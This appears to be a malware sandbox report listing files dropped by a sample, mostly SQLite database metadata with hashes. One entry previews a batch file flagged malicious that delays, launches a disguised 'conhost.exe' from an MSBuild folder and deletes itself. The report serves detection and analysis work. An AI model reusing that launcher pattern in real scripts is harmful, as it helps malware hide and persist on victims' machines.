                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.213660689688185
                                                          Encrypted:false
                                                          SSDEEP:3:nO7ApZe/gn:Q2Ze/g
                                                          MD5:26A246F1A84FDE863F9A12A6BF20C060
                                                          SHA1:03C48121ED6187D042D84FFC5D1E9DD8B3113C19
                                                          SHA-256:53C78D65CA6C8A173A302ADC42A806545212592F2AE6EB9E766D253EA108BEEC
                                                          SHA-512:C1C1888DAEC091478C4E56683C4AB1DFA96DBEC7EFEC30739FB0CF6F291B2C1E6F680A14693DD01EB7C59CB06B097FA987C19F4485C154BF6E6BAF9D483116C8
                                                          Malicious:false
                                                          Preview:7f6ujSujUc2uY2LbVnhiUMAmE
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):259
                                                          Entropy (8bit):5.159641972598987
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DER5IWH11X6yKOZG1N723ffi:HTg9uYDEfPV1XEaHi
                                                          MD5:5FC7FB10B08D086B2E9F4D6335A8F1B2
                                                          SHA1:18348A99E89BBC2249E45327BCA769294378587B
                                                          SHA-256:AD7B7CA03EFAB7D1B3755512474596C7666724245DBC994D5D404C489E7EF8C1
                                                          SHA-512:8738AC1A66F33E3DD377B31A1D4B13DC893782CB169B55433C79043213488D601F269D2FEAB0F3698B31C6217EC9B24A3B5CC7E514BD05FD241F444F0092C5DA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\klrkJh2DBx.bat"
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
